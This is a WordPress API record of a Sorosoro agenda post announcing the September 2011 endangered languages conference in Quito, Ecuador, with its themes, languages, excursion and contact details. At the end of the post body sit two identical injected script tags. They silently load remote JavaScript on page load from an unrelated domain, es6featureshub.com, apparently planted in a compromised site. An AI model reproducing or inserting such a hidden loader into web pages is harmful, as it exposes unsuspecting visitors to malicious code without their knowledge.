{"id":49118,"date":"2011-09-07T12:00:44","date_gmt":"2011-09-07T10:00:44","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=49118"},"modified":"2025-10-21T22:25:14","modified_gmt":"2025-10-21T20:25:14","slug":"september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/","title":{"rendered":"September 7-9, 2011: \u00ab\u00a0Endangered Languages &#8211; the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador."},"content":{"rendered":"<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-49120\" title=\"vocesimagenes\" src=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg\" alt=\"vocesimagenes\" width=\"252\" height=\"158\" \/><\/p>\n<p style=\"text-align: justify;\">The annual <em>Foundation for Endangered Languages<\/em> conference will be held at the Faculty of Communication, Linguistics and Literature of the <strong>Pontificia Cat\u00f3lica university<\/strong> of Quito, <strong>Ecuador<\/strong>, from <strong>September 7 to 9<\/strong>.<\/p>\n<p style=\"text-align: justify;\">The organizers have observed that the threat bearing upon endangered languages, while receiving growing attention in the past years, keeps being considered as an issue only for the people who speak these languages. Thus they have decided to reverse the initial premise and consider <strong>the impact of minority languages<\/strong> on the society that surrounds them, whether through raising their voices or through the images that they give out to outsiders.<\/p>\n<p style=\"text-align: justify;\">Therefore this conference, entitled \u00ab\u00a0<em><strong>Voces e Im\u00e1genes de las Lenguas en Peligro<\/strong><\/em> \u00bb, will focus on the perspectives of the communities themselves (how they\u2019ve protected themselves and how they\u2019ve changed as opposed to how they lost their languages and traditions, how they used techniques coming from outside for their documentation, what alliances were made, etc.) as well as outside perspectives (how outsiders view these linguistic communities, how they\u2019re valued, positively or not, how attitudes towards endangered languages have evolved, impacts of the media, etc.).<\/p>\n<p style=\"text-align: justify;\">The event will also be an occasion to share successful experiences of linguistic revitalization.<\/p>\n<p style=\"text-align: justify;\">Communications will be made in one of the 4 chosen official languages: <strong>Spanish English, Quechua and Shuar<\/strong>.<\/p>\n<p style=\"text-align: justify;\">The schedule concludes on a trip to <strong>Otavalo<\/strong> on September 10, with a visit to the local market, lakes, a sacred waterfall, a condor park and musicians.<\/p>\n<p style=\"text-align: justify;\"><strong>Ecuador<\/strong>, while being one of the smallest countries of Latin America, is known for its geographic, cultural and linguistic diversity. Indigenous movements of the past decades and their renewed claims for the respect of indigenous economic, social and cultural rights have led to profound changes, to the point of becoming models for other countries of the area.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.ogmios.org\/conferences\/2011\/index.htm\" target=\"_blank\">For more information<\/a><\/p>\n<p style=\"text-align: justify;\">Contact: <a href=\"mailto:endangeredlanguages2011@gmail.com\">Dr Marleen Haboud<\/a><\/p>\n<p style=\"text-align: justify;\">Phone: +593 2 2991700<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><strong><em>Endangered Languages &#8211; the Voices they Project, and the Images they Present<\/em><\/strong><\/p>\n<p style=\"text-align: justify;\"><em>September 7-9, 2011<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Facultad de Comunicaci\u00f3n, Ling\u00fc\u00edstica y Literatura<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Pontificia Universidad Cat\u00f3lica<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Quito<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Ecuador<\/em><\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The annual Foundation for Endangered Languages conference will be held at the Faculty of Communication, Linguistics and Literature of the Pontificia Cat\u00f3lica university of Quito, Ecuador, from September 7 to 9. The organizers have observed that the threat bearing upon endangered languages, while receiving growing attention in the past years, keeps being considered as an [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-49118","post","type-post","status-publish","format-standard","hentry","category-calendar"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>September 7-9, 2011: \u00ab\u00a0Endangered Languages - the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador. - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"September 7-9, 2011: \u00ab\u00a0Endangered Languages - the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador. - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"The annual Foundation for Endangered Languages conference will be held at the Faculty of Communication, Linguistics and Literature of the Pontificia Cat\u00f3lica university of Quito, Ecuador, from September 7 to 9. The organizers have observed that the threat bearing upon endangered languages, while receiving growing attention in the past years, keeps being considered as an [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-09-07T10:00:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:25:14+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"September 7-9, 2011: \u00ab\u00a0Endangered Languages &#8211; the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador.\",\"datePublished\":\"2011-09-07T10:00:44+00:00\",\"dateModified\":\"2025-10-21T20:25:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/\"},\"wordCount\":353,\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg\",\"articleSection\":[\"Agenda\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/\",\"url\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/\",\"name\":\"September 7-9, 2011: \u00ab\u00a0Endangered Languages - the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador. - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg\",\"datePublished\":\"2011-09-07T10:00:44+00:00\",\"dateModified\":\"2025-10-21T20:25:14+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#primaryimage\",\"url\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg\",\"contentUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"September 7-9, 2011: \u00ab\u00a0Endangered Languages &#8211; the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/en\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/en\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/en\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"September 7-9, 2011: \u00ab\u00a0Endangered Languages - the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador. - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/","og_locale":"en_US","og_type":"article","og_title":"September 7-9, 2011: \u00ab\u00a0Endangered Languages - the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador. - Sorosoro","og_description":"The annual Foundation for Endangered Languages conference will be held at the Faculty of Communication, Linguistics and Literature of the Pontificia Cat\u00f3lica university of Quito, Ecuador, from September 7 to 9. The organizers have observed that the threat bearing upon endangered languages, while receiving growing attention in the past years, keeps being considered as an [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/","og_site_name":"Sorosoro","article_published_time":"2011-09-07T10:00:44+00:00","article_modified_time":"2025-10-21T20:25:14+00:00","og_image":[{"url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg","type":"","width":"","height":""}],"author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Michel.Lemee","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"September 7-9, 2011: \u00ab\u00a0Endangered Languages &#8211; the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador.","datePublished":"2011-09-07T10:00:44+00:00","dateModified":"2025-10-21T20:25:14+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/"},"wordCount":353,"image":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg","articleSection":["Agenda"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/","url":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/","name":"September 7-9, 2011: \u00ab\u00a0Endangered Languages - the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador. - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#primaryimage"},"image":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg","datePublished":"2011-09-07T10:00:44+00:00","dateModified":"2025-10-21T20:25:14+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#primaryimage","url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg","contentUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/vocesimagenes1.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/en\/2011\/09\/september-7-9-2011-endangered-languages-the-voices-they-project-and-the-images-they-present-conference-quito-ecuador\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/en\/"},{"@type":"ListItem","position":2,"name":"September 7-9, 2011: \u00ab\u00a0Endangered Languages &#8211; the Voices they Project, and the Images they Present \u00bb conference, Quito, Ecuador."}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/en\/#website","url":"https:\/\/www.sorosoro.org\/en\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/en\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/posts\/49118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/comments?post=49118"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/posts\/49118\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/media?parent=49118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/categories?post=49118"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/tags?post=49118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}